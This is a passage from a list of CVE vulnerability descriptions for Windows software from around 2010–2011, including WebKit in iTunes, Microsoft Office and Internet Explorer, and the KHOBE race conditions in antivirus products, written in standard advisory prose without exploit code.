on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0119] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0118] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0117] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0116] Use-after-free vulnerability in the setOuterText method in the htmlelement library in WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to DOM manipulations during iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0115] The DOM level 2 implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, does not properly handle DOM manipulations associated with event listeners during processing of range objects, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0114] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0113] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0112] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0111] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0107] Untrusted search path vulnerability in Microsoft Office XP SP3, Office 2003 SP3, and Office 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .docx file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-0105] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac obtain a certain length value from an uninitialized memory location, which allows remote attackers to trigger a buffer overflow and execute arbitrary code via a crafted Excel file, aka "Excel Data Initialization Vulnerability." [CVE-2011-0104] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HLink record in an Excel file, aka "Excel Buffer Overwrite Vulnerability." [CVE-2011-0103] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted record information in an Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2011-0101] Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted RealTimeData record, related to a stTopic field, doubly-byte characters, and an incorrect pointer calculation, aka "Excel Record Parsing WriteAV Vulnerability." [CVE-2011-0098] Integer signedness error in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0097] Integer underflow in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Layouts Handling Memory Corruption Vulnerability." [CVE-2011-0093] ELEMENTS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 does not properly parse structures during the opening of a Visio file, which allows remote attackers to execute arbitrary code via a file containing a malformed structure, aka "Visio Data Type Memory Corruption Vulnerability." [CVE-2011-0092] The LZW stream decompression functionality in ORMELEMS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 allows remote attackers to execute arbitrary code via a Visio file with a malformed VisioDocument stream that triggers an exception handler that accesses an object that has not been fully initialized, which triggers memory corruption, aka "Visio Object Memory Corruption Vulnerability." [CVE-2011-0071] Directory traversal vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 on Windows allows remote attackers to determine the existence of arbitrary files, and possibly load resources, via vectors involving a resource: URL. [CVE-2011-0058] Buffer overflow in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, and SeaMonkey before 2.0.12, on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a long string that triggers construction of a long text run. [CVE-2011-0038] Untrusted search path vulnerability in Microsoft Internet Explorer 8 might allow local users to gain privileges via a Trojan horse IEShims.dll in the current working directory, as demonstrated by a Desktop directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-0036] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, relagted to a "dangling pointer," aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2010-2556 and CVE-2011-0035. [CVE-2011-0035] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2010-2556 and CVE-2011-0036. [CVE-2011-0029] Untrusted search path vulnerability in the client in Microsoft Remote Desktop Connection 5.2, 6.0, 6.1, and 7.0 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .rdp file, aka "Remote Desktop Insecure Library Loading Vulnerability." [CVE-2010-5184] DISPUTED Race condition in ZoneAlarm Extreme Security 9.1.507.000 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5183] DISPUTED Race condition in Webroot Internet Security Essentials 6.1.0.145 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5182] DISPUTED Race condition in VirusBuster Internet Security Suite 3.2 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5181] DISPUTED Race condition in VIPRE Antivirus Premium 4.0.3272 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5180] DISPUTED Race condition in VBA32 Personal 3.12.12.4 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5179] DISPUTED Race condition in Trend Micro Internet Security Pro 2010 17.50.1647.0000 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5178] DISPUTED Race condition in ThreatFire 4.7.0.17 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5177] DISPUTED Race condition in Sophos Endpoint Security and Control 9.0.5 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: the vendor disputes this issue because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5176] DISPUTED Race condition in Security Shield 2010 13.0.16.313 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5175] DISPUTED Race condition in PrivateFirewall 7.0.20.37 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5174] DISPUTED Race condition in Prevx 3.0.5.143 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5173] DISPUTED Race condition in PC Tools Firewall Plus 6.0.0.88 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5172] DISPUTED Race condition in Panda Internet Security 2010 15.01.00 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5171] DISPUTED Race condition in Outpost Security Suite Pro 6.7.3.3063.452.0726 and 7.0.3330.505.1221 BETA on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5170] DISPUTED Race condition in Online Solutions Security Suite 1.5.14905.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5169] DISPUTED Race condition in Online Armor Premium 4.0.0.35 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5168] DISPUTED Race condition in Symantec Norton Internet Security 2010 17.5.0.127 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5167] DISPUTED Race condition in Norman Security Suite PRO 8.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5166] DISPUTED Race condition in McAfee Total Protection 2010 10.0.580 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5165] DISPUTED Race condition in Malware Defender 2.6.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5164] DISPUTED Race condition in KingSoft Personal Firewall 9 Plus 2009.05.07.70 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5163] DISPUTED Race condition in Kaspersky Internet Security 2010 9.0.0.736 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5162] DISPUTED Race condition in G DATA TotalCare 2010 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5161] DISPUTED Race condition in F-Secure Internet Security 2010 10.00 build 246 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5160] DISPUTED Race condition in ESET Smart Security 4.2.35.3 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5159] DISPUTED Race condition in Dr.Web Security Space Pro 6.0.0.03100 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5158] DISPUTED Race condition in DefenseWall Personal Firewall 3.00 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5157] Race condition in Comodo Internet Security before 4.1.149672.916 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. [CVE-2010-5156] DISPUTED Race condition in CA Internet Security Suite Plus 2010 6.0.0.272 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5155] DISPUTED Race condition in Blink Professional 4.6.1 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5154] DISPUTED Race condition in BitDefender Total Security 2010 13.0.20.347 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5153] DISPUTED Race condition in Avira Premium Security Suite 10.0.0.536 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5152] DISPUTED Race condition in AVG Internet Security 9.0.791 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5151] DISPUTED Race condition in avast! Internet Security 5.0.462 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5150] DISPUTED Race condition in 3D EQSecure Professional Edition 4.2 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5145] The Filtering Service in Websense Web Security and Web Filter before 6.3.1 Hotfix 136 and 7.x before 7.1.1 on Windows allows remote attackers to cause a denial of service (filtering outage) via a crafted sequence of characters in a URI. [CVE-2010-5144] The ISAPI Filter plug-in in Websense Enterprise, Websense Web Security, and Websense Web Filter 6.3.3 and earlier, when used in conjunction with a Microsoft ISA or Microsoft Forefront TMG server, allows remote attackers to bypass intended filtering and monitoring activities for web traffic via an HTTP Via header. [CVE-2010-5071] The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. [CVE-2010-4833] Untrusted search path vulnerability in modules/engines/ms-windows/xp_theme.c in GTK+ before 2.24.0 allows local users to gain privileges via a Trojan horse uxtheme.dll file in the current working directory, a different vulnerability than CVE-2010-4831. [CVE-2010-4785] The do_extendedOp function in ibmslapd in IBM Tivoli Directory Server (TDS) 6.0 before 6.0.0.62 (aka 6.0.0.8-TIV-ITDS-IF0004) on Linux, Solaris, and Windows allows remote authenticated users to cause a denial of service (ABEND) via a malformed LDAP extended operation that triggers certain comparisons involving the NULL operation OID. [CVE-2010-4643] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Truevision TGA (TARGA) file in an ODF or Microsoft Office document. [CVE-2010-4588] The WBEMSingleView.ocx ActiveX control 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier allows remote attackers to execute arbitrary code via a crafted argument to the ReleaseContext method, a different vector than CVE-2010-3973, possibly an untrusted pointer dereference. [CVE-2010-4587] Opera before 11.00 on Windows does not properly implement the Insecure Third Party Module warning message, which might make it easier for user-assisted remote attackers to have an unspecified impact via a crafted module. [CVE-2010-4466] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, Solaris, and, Linux [CVE-2010-4451] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, when using Java Update, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install. [CVE-2010-4423] Unspecified vulnerability in the Cluster Verify Utility component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1, when running on Windows, allows local users to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-4368] awstats.cgi in AWStats before 7.0 on Windows accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located at a UNC share pathname. [CVE-2010-4294] The frame decompression functionality in the VMnc media codec in VMware Movie Decoder before 6.5.5 build 328052 and 7.x before 7.1.2 build 301548, VMware Workstation 6.5.x before 6.5.5 build 328052 and 7.x before 7.1.2 build 301548 on Windows, VMware Player 2.5.x before 2.5.5 build 246459 and 3.x before 3.1.2 build 301548 on Windows, and VMware Server 2.x on Windows does not properly validate an unspecified size field, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted video file. [CVE-2010-4253] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file in an ODF or Microsoft Office document, as demonstrated by a PowerPoint (aka PPT) document. [CVE-2010-4121] DISPUTED The TCP-to-ODBC gateway in IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.3 does not require authentication for SQL statements, which allows remote attackers to modify, create, or read database records via a session on TCP port 2020. NOTE: the vendor disputes this issue, stating that the "default Microsoft Access database is not password protected because it is intended to be used for evaluation purposes only." [CVE-2010-4091] The EScript.api plugin in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.1, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document that triggers memory corruption, involving the printSeps function. NOTE: some of these details are obtained from third party information. [CVE-2010-3976] Untrusted search path vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a file that is processed by Flash Player. [CVE-2010-3972] Heap-based buffer overflow in the TELNET_STREAM_CONTEXT::OnSendData function in ftpsvc.dll in Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) 7.0, and IIS 7.5, allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via a crafted FTP command, aka "IIS FTP Service Heap Buffer Overrun Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-3971] Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability." [CVE-2010-3964] Unrestricted file upload vulnerability in the Document Conversions Launcher Service in Microsoft Office SharePoint Server 2007 SP2, when the Document Conversions Load Balancer Service is enabled, allows remote attackers to execute arbitrary code via a crafted SOAP request to TCP port 8082, aka "Malformed Request Code Execution Vulnerability." [CVE-2010-3962] Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010. [CVE-2010-3958] The x86 JIT compiler in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 does not properly compile function calls, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Stack Corruption Vulnerability." [CVE-2010-3955] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 does not properly perform array indexing, which allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2010-3954] Microsoft Publisher 2002 SP3, 2003 SP3, and 2010 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Publisher file, aka "Microsoft Publisher Memory Corruption Vulnerability." [CVE-2010-3952] The FlashPix image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted FlashPix image in an Office document, aka "FlashPix Image Converter Heap Corruption Vulnerability." [CVE-2010-3951] Buffer overflow in the FlashPix image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted FlashPix image in an Office document, aka "FlashPix Image Converter Buffer Overflow Vulnerability." [CVE-2010-3950] The TIFF image converter in the graphics filters in Microsoft Office XP SP3, Office Converter Pack, and Works 9 does not properly convert data, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted TIFF image in an Office document, aka "TIFF Image Converter Memory Corruption Vulnerability." [CVE-2010-3949] Buffer overflow in the TIFF image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted TIFF image in an Office document, aka "TIFF Image Converter Buffer Overflow Vulnerability." [CVE-2010-3947] Heap-based buffer overflow in the TIFF image converter in the graphics filters in Microsoft Office XP SP3, Office Converter Pack, and Works 9 allows remote attackers to execute arbitrary code via a crafted TIFF image in an Office document, aka "TIFF Image Converter Heap Overflow Vulnerability." [CVE-2010-3946] Integer overflow in the PICT image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted PICT image in an Office document, aka "PICT Image Converter Integer Overflow Vulnerability." [CVE-2010-3945] Buffer overflow in the CGM image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted CGM image in an Office document, aka "CGM Image Converter Buffer Overrun Vulnerability." [CVE-2010-3937] Microsoft Exchange Server 2007 SP2 on the x64 platform allows remote authenticated users to cause a denial of service (infinite loop and MSExchangeIS outage) via a crafted RPC request, aka "Exchange Server Infinite Loop Vulnerability." [CVE-2010-3936] Cross-site scripting (XSS) vulnerability in Signurl.asp in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS in Signurl.asp Vulnerability." [CVE-2010-3886] The CTimeoutEventList::InsertIntoTimeoutList function in Microsoft mshtml.dll uses a certain pointer value as part of producing Timer ID values for the setTimeout and setInterval methods in VBScript and JScript, which allows remote attackers to obtain sensitive information about the heap memory addresses used by an application, as demonstrated by the Internet Explorer 8 application. [CVE-2010-3826] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of colors in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3824] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving SVG use elements. [CVE-2010-3823] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving Geolocation objects. NOTE: this might overlap CVE-2010-3415. [CVE-2010-3822] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses an uninitialized pointer during processing of Cascading Style Sheets (CSS) counter styles, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted 